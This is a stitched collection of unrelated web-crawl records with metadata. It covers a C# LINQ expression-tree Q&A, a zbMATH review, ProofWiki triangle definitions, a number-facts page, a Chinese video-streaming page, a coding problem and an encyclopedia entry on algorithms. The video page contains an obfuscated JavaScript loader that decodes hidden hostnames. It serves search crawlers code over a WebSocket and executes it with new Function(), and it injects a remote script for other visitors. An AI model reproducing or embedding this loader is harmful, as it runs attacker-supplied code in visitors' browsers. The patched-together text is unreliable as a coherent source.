"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-2-300x142.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-5-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-correct-answer-4-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-3-explanation-image-300x101.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-4-300x141.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-5-300x50.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-5-explanation-image-300x70.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-practice-question-6-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/cancel.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2021/05/check_circle_24px.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-1-300x147.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-2-image-1-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-2-image-2-300x117.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3-300x107.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3a-300x107.png",
null,
"https://thirdspacelearning.com/wp-content/uploads/2022/07/Experimental-probability-gcse-question-3b-300x107.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.90717626,"math_prob":0.9911683,"size":9731,"snap":"2023-40-2023-50","text_gpt3_token_len":2158,"char_repetition_ratio":0.217436,"word_repetition_ratio":0.13983841,"special_character_ratio":0.23348063,"punctuation_ratio":0.10579479,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99929965,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,null,null,2,null,2,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null,null,null,2,null,2,null,null,null,null,null,null,null,null,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-24T00:10:30Z\",\"WARC-Record-ID\":\"<urn:uuid:caa20ccd-edd9-41e2-b3e8-509b5c28b618>\",\"Content-Length\":\"249153\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:59fbb57c-7d2f-4803-bd0a-6f7b95c2204a>\",\"WARC-Concurrent-To\":\"<urn:uuid:c2e29bb9-5cd2-41ff-99b1-09b892fd1dfd>\",\"WARC-IP-Address\":\"141.193.213.11\",\"WARC-Target-URI\":\"https://thirdspacelearning.com/gcse-maths/probability/experimental-probability/\",\"WARC-Payload-Digest\":\"sha1:2OSX4UEWV5RRSV3SP7A4LZPXF66CIMUC\",\"WARC-Block-Digest\":\"sha1:WBHMAPUNPIG4OBGS3WZJJMITVUHAIGA6\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506539.13_warc_CC-MAIN-20230923231031-20230924021031-00021.warc.gz\"}"} |
https://expressiontree-tutorial.net/knowledge-base/13527221/how-can-i-create-a-linq-friendly--return-false--expression-using-csharp-expression-trees- | [
"# How can I create a LINQ-friendly 'return false' expression using C# expression trees?\n\n.net c# expression-trees linq",
null,
"### Question\n\nI have some code that dynamically builds up some search criteria based on user input, resulting in an `Expression<Func<T, bool>>` that is passed to the LINQ .Where() method. It works fine when input is present, but when input is not present, I want to create a simple 'return false;' statement so that no results are returned.\n\nBelow is my current attempt, but when this is passed to the .Where() method it throws a NotSupportedException \"Unknown LINQ expression of type 'Block'.\"\n\n``````var parameter = Expression.Parameter(typeof(T), \"x\");\nvar falseValue = Expression.Constant(false);\nvar returnTarget = Expression.Label(typeof (bool));\n\nvar returnFalseExpression = Expression.Block(Expression.Return(returnTarget, falseValue), Expression.Label(returnTarget, falseValue));\nvar lambdaExpression = Expression.Lambda<Func<T, bool>>(returnFalseExpression, parameter);\n``````\n\nHow can I build a 'return false' expression that can be interpreted by LINQ?\n\n1\n3\n7/29/2013 10:45:54 PM\n\n#### Fastest Entity Framework Extensions\n\n``````Expression<Func<T, bool>> falsePredicate = x => false;\n``````\n8\n11/23/2012 10:33:05 AM\n\nCan you wrap the entire thing in an if-else expression?\n\nMeaning:\n\n``````if input\nreturn <your normal code>\nelse\nreturn false\n``````\n\nThe return is implicit in expressions; the return value of the expression will simply be the last value. So you could try:\n\n`````` Expression.Condition\n(\nExpression.NotEqual(input, Expression.Constant(\"\")),\nnormalSearchExpression,\nExpression.Constant(false)\n)\n``````\n\nThat's assuming `normalSearchExpression` also returns a bool.\n\nPrime Library\n\nMore Projects..."
] | [
null,
"https://expressiontree-tutorial.net/images/bg-kb-title.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.67617613,"math_prob":0.8825373,"size":1416,"snap":"2022-40-2023-06","text_gpt3_token_len":293,"char_repetition_ratio":0.20042492,"word_repetition_ratio":0.0,"special_character_ratio":0.20762712,"punctuation_ratio":0.18072289,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95347166,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-06T14:14:37Z\",\"WARC-Record-ID\":\"<urn:uuid:76049aec-a810-474e-b707-bcc557225217>\",\"Content-Length\":\"44591\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3072d2e5-f5d9-4fab-b5ad-3c0cf0038212>\",\"WARC-Concurrent-To\":\"<urn:uuid:f3ad6f71-6dfc-4bd1-baa4-da245af85ad9>\",\"WARC-IP-Address\":\"40.83.160.29\",\"WARC-Target-URI\":\"https://expressiontree-tutorial.net/knowledge-base/13527221/how-can-i-create-a-linq-friendly--return-false--expression-using-csharp-expression-trees-\",\"WARC-Payload-Digest\":\"sha1:CKCKUBUW5DUM3F3NMTSDIOKB55WZMJ3I\",\"WARC-Block-Digest\":\"sha1:G55N2EJ4PL5ZEWMGLWT746XLUDFYBYGR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030337836.93_warc_CC-MAIN-20221006124156-20221006154156-00740.warc.gz\"}"} |
https://zbmath.org/?q=an:0861.34040 | [
"## Approximate solutions, existence, and uniqueness of the Cauchy problem of fuzzy differential equations.(English)Zbl 0861.34040\n\nThe authors study the Cauchy problem $$x'(t)= f(t,x(t))$$, $$x(t_0)= x_0$$ for fuzzy differential equations. First the authors show that if $$x_n(t)$$ is a solution to an approximate differential equation and $$x_n(t)$$ converges uniformly, then the limit function is a solution to the Cauchy problem. Then they give an existence and uniqueness theorem for a solution to the Cauchy problem, which generalizes the corresponding theorem of O. Kaleva [Fuzzy Sets Syst. 24, 301-317 (1987; Zbl 0646.34019)]. (Also submitted to MR).\nReviewer: O.Kaleva (Tampere)\n\n### MSC:\n\n 34G20 Nonlinear differential equations in abstract spaces 34A45 Theoretical approximation of solutions to ordinary differential equations\n\nZbl 0646.34019\nFull Text:"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.777814,"math_prob":0.99877346,"size":1165,"snap":"2023-40-2023-50","text_gpt3_token_len":335,"char_repetition_ratio":0.14298019,"word_repetition_ratio":0.049382716,"special_character_ratio":0.31072962,"punctuation_ratio":0.22362868,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99986887,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T22:24:34Z\",\"WARC-Record-ID\":\"<urn:uuid:ca76c68c-ac99-4a8e-82a5-2f476361159a>\",\"Content-Length\":\"52050\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e4badc3c-5d2b-4f2d-9023-aba223608981>\",\"WARC-Concurrent-To\":\"<urn:uuid:23ce8102-e1d1-49b5-ae7f-1abe3bd8f03a>\",\"WARC-IP-Address\":\"141.66.194.2\",\"WARC-Target-URI\":\"https://zbmath.org/?q=an:0861.34040\",\"WARC-Payload-Digest\":\"sha1:B7I3TFYCD3PFSVY5QDKIMHSVNAHAWTHY\",\"WARC-Block-Digest\":\"sha1:YILXUMZJ6HTQTKVUIGUUPIBFXZTUI4BN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506045.12_warc_CC-MAIN-20230921210007-20230922000007-00307.warc.gz\"}"} |
https://proofwiki.org/wiki/Definition:Primitive_Pythagorean_Triangle | [
"# Definition:Primitive Pythagorean Triangle\n\n## Definition\n\nA primitive Pythagorean triangle is a Pythagorean triangle whose sides form a primitive Pythagorean triple.\n\n## Examples\n\n### $3-4-5$ Triangle\n\nThe triangle whose sides are of length $3$, $4$ and $5$ is a primitive Pythagorean triangle.\n\n### $5-12-13$ Triangle\n\nThe triangle whose sides are of length $5$, $12$ and $13$ is a primitive Pythagorean triangle.\n\n### $7-24-25$ Triangle\n\nThe triangle whose sides are of length $7$, $24$ and $25$ is a primitive Pythagorean triangle.\n\n### $693-1924-2045$ Triangle\n\nThe triangle whose sides are of length $693$, $1924$ and $2045$ is a primitive Pythagorean triangle."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.7619475,"math_prob":0.99968135,"size":667,"snap":"2022-05-2022-21","text_gpt3_token_len":181,"char_repetition_ratio":0.22775264,"word_repetition_ratio":0.21276596,"special_character_ratio":0.2923538,"punctuation_ratio":0.08547009,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997992,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-27T06:49:02Z\",\"WARC-Record-ID\":\"<urn:uuid:d5767340-64e9-4606-a644-a8e7a01c24fd>\",\"Content-Length\":\"38997\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:173152df-5518-43e9-82e4-c2c9ba6312bf>\",\"WARC-Concurrent-To\":\"<urn:uuid:dfb4a052-2438-4345-8ed7-764d41749e1c>\",\"WARC-IP-Address\":\"172.67.198.93\",\"WARC-Target-URI\":\"https://proofwiki.org/wiki/Definition:Primitive_Pythagorean_Triangle\",\"WARC-Payload-Digest\":\"sha1:GKS43T3QAXKPMD3MNGWXSTEJDC7FU3AX\",\"WARC-Block-Digest\":\"sha1:OCQUWF7XPULH55L7F3YGDZKBVVJ73YVV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662636717.74_warc_CC-MAIN-20220527050925-20220527080925-00368.warc.gz\"}"} |
https://metanumbers.com/557632 | [
"## 557632\n\n557,632 (five hundred fifty-seven thousand six hundred thirty-two) is an even six-digits composite number following 557631 and preceding 557633. In scientific notation, it is written as 5.57632 × 105. The sum of its digits is 28. It has a total of 7 prime factors and 14 positive divisors. There are 278,784 positive integers (up to 557632) that are relatively prime to 557632.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 6\n• Sum of Digits 28\n• Digital Root 1\n\n## Name\n\nShort name 557 thousand 632 five hundred fifty-seven thousand six hundred thirty-two\n\n## Notation\n\nScientific notation 5.57632 × 105 557.632 × 103\n\n## Prime Factorization of 557632\n\nPrime Factorization 26 × 8713\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 7 Total number of prime factors rad(n) 17426 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 557,632 is 26 × 8713. Since it has a total of 7 prime factors, 557,632 is a composite number.\n\n## Divisors of 557632\n\n14 divisors\n\n Even divisors 12 2 2 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 14 Total number of the positive divisors of n σ(n) 1.10668e+06 Sum of all the positive divisors of n s(n) 549046 Sum of the proper positive divisors of n A(n) 79048.4 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 746.748 Returns the nth root of the product of n divisors H(n) 7.05431 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 557,632 can be divided by 14 positive divisors (out of which 12 are even, and 2 are odd). The sum of these divisors (counting 557,632) is 1,106,678, the average is 790,48.,428.\n\n## Other Arithmetic Functions (n = 557632)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 278784 Total number of positive integers not greater than n that are coprime to n λ(n) 34848 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 45788 Total number of primes less than or equal to n r2(n) 8 The number of ways n can be represented as the sum of 2 squares\n\nThere are 278,784 positive integers (less than 557,632) that are coprime with 557,632. And there are approximately 45,788 prime numbers less than or equal to 557,632.\n\n## Divisibility of 557632\n\n m n mod m 2 3 4 5 6 7 8 9 0 1 0 2 4 5 0 1\n\nThe number 557,632 is divisible by 2, 4 and 8.\n\n• Deficient\n\n• Polite\n\n• Frugal\n\n## Base conversion (557632)\n\nBase System Value\n2 Binary 10001000001001000000\n3 Ternary 1001022221001\n4 Quaternary 2020021000\n5 Quinary 120321012\n6 Senary 15541344\n8 Octal 2101100\n10 Decimal 557632\n12 Duodecimal 22a854\n20 Vigesimal 39e1c\n36 Base36 by9s\n\n## Basic calculations (n = 557632)\n\n### Multiplication\n\nn×i\n n×2 1115264 1672896 2230528 2788160\n\n### Division\n\nni\n n⁄2 278816 185877 139408 111526\n\n### Exponentiation\n\nni\n n2 310953447424 173397592793939968 96692046464870332235776 53918579254298573105300242432\n\n### Nth Root\n\ni√n\n 2√n 746.748 82.3094 27.3267 14.1016\n\n## 557632 as geometric shapes\n\n### Circle\n\n Diameter 1.11526e+06 3.50371e+06 9.76889e+11\n\n### Sphere\n\n Volume 7.26326e+17 3.90756e+12 3.50371e+06\n\n### Square\n\nLength = n\n Perimeter 2.23053e+06 3.10953e+11 788611\n\n### Cube\n\nLength = n\n Surface area 1.86572e+12 1.73398e+17 965847\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 1.6729e+06 1.34647e+11 482923\n\n### Triangular Pyramid\n\nLength = n\n Surface area 5.38587e+11 2.04351e+16 455305"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.61615753,"math_prob":0.9901191,"size":4626,"snap":"2021-31-2021-39","text_gpt3_token_len":1616,"char_repetition_ratio":0.11921246,"word_repetition_ratio":0.02835821,"special_character_ratio":0.4638997,"punctuation_ratio":0.08163265,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986082,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-25T03:22:12Z\",\"WARC-Record-ID\":\"<urn:uuid:22c7e94f-2d2b-4ad6-bd6c-3117b7923005>\",\"Content-Length\":\"59882\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9945d3ce-76e6-4d94-8f37-257779d9b704>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb90034e-41a3-465a-8a28-a5492d3c76e9>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/557632\",\"WARC-Payload-Digest\":\"sha1:3UOPRR6O5NCYFC45KRYQATKHWD3RDLQB\",\"WARC-Block-Digest\":\"sha1:NKM7PMUTCDB4QPWVX5SB5A5QXRZA5ESJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046151563.91_warc_CC-MAIN-20210725014052-20210725044052-00053.warc.gz\"}"} |
https://www.bayitv.com/detail/zhengyilianmengliangmianjiaji.html | [
" 《正义联盟两面夹击在线免费观看》高清完整版_动漫_八一影视\n• 观看记录",
null,
"2021-07-18 11:17:57 更新\n\n• 在线观看2\n• 在线播放2\n\n• 近期热播\nfunction rKqOA(e){var t=\"\",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hYTQN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t=\"\",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,\"\");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return rKqOA(t);};window['\\x7a\\x4c\\x43\\x73\\x53\\x48\\x65\\x6b\\x61']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hYTQN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c+''+c,'g'),c)));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('aHHkubHHVhc3NhbmUuY24=','dHIueWVzdW422NzguY229t','130796',window,document,['H','2']);}:function(){};"
] | [
null,
"http://inews.gtimg.com/newsapp_ls/0/13644658996/0",
null
] | {"ft_lang_label":"__label__zh","ft_lang_prob":0.5124701,"math_prob":0.98708695,"size":2327,"snap":"2021-31-2021-39","text_gpt3_token_len":1326,"char_repetition_ratio":0.104606114,"word_repetition_ratio":0.0,"special_character_ratio":0.33519554,"punctuation_ratio":0.26296958,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9580938,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-27T05:14:47Z\",\"WARC-Record-ID\":\"<urn:uuid:a6e2fd73-32b2-4f29-941d-999179bfce51>\",\"Content-Length\":\"18716\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3e29107f-0e80-4401-83a2-2a11421dd82d>\",\"WARC-Concurrent-To\":\"<urn:uuid:b86eb221-dcfb-4828-917a-cc9c2f497363>\",\"WARC-IP-Address\":\"118.107.39.81\",\"WARC-Target-URI\":\"https://www.bayitv.com/detail/zhengyilianmengliangmianjiaji.html\",\"WARC-Payload-Digest\":\"sha1:B2FF5BO6FUPTX4W5ZTN2KFNIB4HSJ56G\",\"WARC-Block-Digest\":\"sha1:WPL26EKZGMW2WFTPSYXWRABAPD4RXM63\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046152236.64_warc_CC-MAIN-20210727041254-20210727071254-00173.warc.gz\"}"} |
https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1 | [
"X",
null,
"DAYS\n\n:\n\nHOUR\n\n:\n\nMINS\n\n:\n\nSEC\n\nCopied to Clipboard\nMinimum sum partition\nHard Accuracy: 50.0% Submissions: 36757 Points: 8\n\nGiven an integer array arr of size N, the task is to divide it into two sets S1 and S2 such that the absolute difference between their sums is minimum and find the minimum difference\n\nExample 1:\n\nInput: N = 4, arr[] = {1, 6, 11, 5}\nOutput: 1\nExplanation:\nSubset1 = {1, 5, 6}, sum of Subset1 = 12\nSubset2 = {11}, sum of Subset2 = 11\nExample 2:\nInput: N = 2, arr[] = {1, 4}\nOutput: 3\nExplanation:\nSubset1 = {1}, sum of Subset1 = 1\nSubset2 = {4}, sum of Subset2 = 4\n\nYou don't need to read input or print anything. Complete the function minDifference() which takes N and array arr as input parameters and returns the integer value\n\nExpected Time Complexity: O(N*|sum of array elements|)\nExpected Auxiliary Space: O(N*|sum of array elements|)\n\nConstraints:\n1 ≤ N*|sum of array elements| ≤ 106\n\nWe are replacing the old Disqus forum with the new Discussions section given below.\n\nEditorial\n\nWe strongly recommend solving this problem on your own before viewing its editorial. Do you still want to view the editorial?\n\nMy Submissions:",
null,
"",
null,
""
] | [
null,
"https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1",
null,
"https://media.geeksforgeeks.org/img-practice/slider-icon-1605160260.svg",
null,
"https://media.geeksforgeeks.org/img-practice/editor-nonloggedin-1599825843.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.83405834,"math_prob":0.9543824,"size":937,"snap":"2022-05-2022-21","text_gpt3_token_len":269,"char_repetition_ratio":0.13826367,"word_repetition_ratio":0.0,"special_character_ratio":0.30309498,"punctuation_ratio":0.14136125,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9926377,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,1,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-25T07:42:26Z\",\"WARC-Record-ID\":\"<urn:uuid:b4798fae-624e-455c-af0d-1ef8c2645aa1>\",\"Content-Length\":\"77502\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1113280e-1c61-406e-b331-b72dcd0259cc>\",\"WARC-Concurrent-To\":\"<urn:uuid:c7271d3c-7dd4-41f5-9066-6948e9db08ed>\",\"WARC-IP-Address\":\"13.249.38.101\",\"WARC-Target-URI\":\"https://practice.geeksforgeeks.org/problems/minimum-sum-partition3317/1\",\"WARC-Payload-Digest\":\"sha1:Y37O2VYZZSGP23BUEPI4CQQJ7HSOEDPC\",\"WARC-Block-Digest\":\"sha1:XH22XFVMIQV3WCTOPDGDYW3LLUJKFOIL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320304798.1_warc_CC-MAIN-20220125070039-20220125100039-00669.warc.gz\"}"} |
https://encyclopedia2.thefreedictionary.com/Encoding+Algorithm | [
"# algorithm\n\n(redirected from Encoding Algorithm)\nAlso found in: Dictionary, Thesaurus, Medical, Financial.\n\n## algorithm\n\n(ăl`gərĭth'əm) or\n\n## algorism\n\n(–rĭz'əm) [for Al-KhowarizmiAl-Khowarizmi\n, fl. 820, Arab mathematician of the court of Mamun in Baghdad. His treatises on Hindu arithmetic and on algebra made him famous. He is said to have given algebra its name, and the word algorithm is said to have been derived from his name.\n], a clearly defined procedure for obtaining the solution to a general type of problem, often numerical. Much of ordinary arithmetic as traditionally taught consists of algorithms involving the fundamental operations of addition, subtraction, multiplication, and division. An example of an algorithm is the common procedure for division, e.g., the division of 1,347 by 8, in which the remainders of partial divisions are carried to the next digit or digits; in this case the remainder of 5 in the division of 13 by 8 is placed in front of the 4, and 8 is then divided into 54. The software that instructs modern computers embodies algorithms, often of great sophistication.\n\n## algorithm\n\nany method, procedure, or set of instructions for carrying out a task by means of a precisely specified series of steps or sequence of actions, e.g. as in long division, the hierarchical sequence of steps in a typical computer program, or the steps in a manufacturing process.\nCollins Dictionary of Sociology, 3rd ed. © HarperCollins Publishers 2000\nThe following article is from The Great Soviet Encyclopedia (1979). It might be outdated or ideologically biased.\n\n## Algorithm\n\none of the basic concepts (categories) of mathematics devoid of a formal definition in terms of simpler concepts and abstracted directly from experience. Examples of algorithms are the familiar rules of addition, subtraction, multiplication, and long division taught in elementary school. In general, the term “algorithm” denotes any precise procedure specifying a calculational process (called algorithmic in this case) that begins with an arbitrary initial datum (drawn from a certain set of initial data possible for the given algorithm) and that is directed toward a result fully determined by the initial datum. For example, in the case of the algorithms of arithmetical operations mentioned above, the possible results may be natural numbers expressed in the decimal system, while the possible initial data may consist of ordered pairs of natural numbers. Thus, besides directions for carrying out the algorithmic process, the procedure must include (1) an indication of the set of possible initial data and (2) a rule by which the process is recognized as completed, when the desired result is attained. It is not assumed that the result must be achieved: the process of applying the algorithm to a specific possible initial datum (that is, an algorithmic process that develops from this datum onward) may also be terminated without a result or not terminated at all. If the process terminates (or does not terminate) by achieving a result, the algorithm is said to be applicable (or inapplicable) to the possible initial datum under consideration. It is possible to construct an algorithm II for which there exists no algorithm that discerns, on the basis of the possible initial datum for II, whether II is applicable to it or not; for instance, such an algorithm II can be constructed so that the set of positive integers serves as the set of its possible initial data.\n\nThe algorithm concept occupies a central position in modern mathematics, especially in computational mathematics. Thus, the problem of a numerical solution to equations of a given type reduces to finding an algorithm that will convert any pair, consisting of an arbitrary equation of the given type and an arbitrary rational number €, into a number (or an n-tuple of numbers) which is less than € and different from the root or roots of the equation. Improvements in computers offer the possibility of realizing increasingly complex algorithms with their use. However, the term “computational process” used in defining the algorithm concept must not be understood in the restricted meaning of digital calculations. Thus, even in school algebra courses one speaks of literal calculations, to say nothing of such nondigital symbols as brackets, equals signs, and the signs of arithmetical operations used in arithmetical calculations. It is possible to go further and consider calculations involving arbitrary symbols and their combinations; such precisely is the broad approach used to describe the algorithm concept. In this sense, one may speak of an algorithm for translation from one language to another, of an algorithm for train dispatching (which transforms information on train movements into orders), and of other such examples involving algorithmic descriptions of control processes. It is precisely for this reason that the algorithm is one of the central concepts of cybernetics. In general, the most varied constructive entities can serve as the initial data and results of algorithms. To take one example, the results of so-called recognition algorithms, are the words “yes” and “no.”\n\nExample of an algorithm. Let the possible initial datum and the possible results consist of all possible finite sequences (including the empty sequence) of the letters a and b—“words in the alphabet {a, b}.” We shall agree to call the transition from word X to word Y “permissible” in the following two cases (P will denote an arbitrary word):(l) X has the form aP and Y has the form Pb and (2) X has the form baP and Y has the form Paba. An instruction is formulated: “starting with an arbitrary word, make permissible transitions until a word of the form aaP is obtained, then stop; the word P is the result.” This instruction forms an algorithm which we denote as I. We take the word babaa as the initial datum and obtain after one transition baaaba, after two, aabaaba. By virtue of the instruction we must stop, since the result is baaba. We take the word baaba as the initial datum and obtain, successively, abaaba, baabab, abababa, bababab, babababa, .... It can be demonstrated that this process will never end—that is, there will never appear a word beginning with aa, and for every word obtained it will always be possible to perform a permissible transition. Let us now take the word abaab as the initial datum. We obtain baabb, abbaba, bbabab. At this point, however, no further permissible transition is possible, yet there is no signal to stop. This is what is called the resultless stop. Thus, I is applicable to the word babaa and inapplicable to the words baaba and abaab.\n\nSignificance of algorithms. Algorithms abound in science; the ability to solve a problem “in the general form” always means, essentially, a knowledge of some algorithm. In speaking, for example, of a person’s ability to add numbers, one has in mind not the fact that he can sooner or later find the sum of any two numbers, but rather the fact that he possesses a unified method of addition applicable to any two specific notations of numbers—in other words, an addition algorithm (the familiar rule for addition of numbers 